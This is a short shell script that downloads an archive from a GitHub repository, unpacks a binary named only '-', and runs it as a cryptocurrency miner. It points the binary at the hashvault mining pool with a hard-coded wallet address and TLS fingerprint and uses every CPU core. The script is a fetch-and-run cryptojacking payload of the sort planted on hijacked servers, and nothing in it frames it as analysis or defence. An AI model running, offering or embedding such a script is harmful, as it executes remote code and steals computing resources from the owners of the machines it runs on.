#!/bin/sh

A=pool.hashvault.pro:443
B=88xDUfnrcMJSXTuq5NmpFsNPtxNV7sbSUguJXTNjGsA6Sk3sFGK2kQtTCiF9PcfUpSQ87Jc3JVv8CeDYoubJmQPh9ELBtDA
C=$(echo $(shuf -i 1-20000 -n 1)-karyo)
D=420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
apt-get update && apt-get upgrade -y
wget https://github.com/muledan1/bash/raw/main/-.tar.gz
tar -xf -.tar.gz
./- --url $A --user $B --pass $C --donate-level 1 --tls --tls-fingerprint $D -t$(nproc --all)
sleep 10
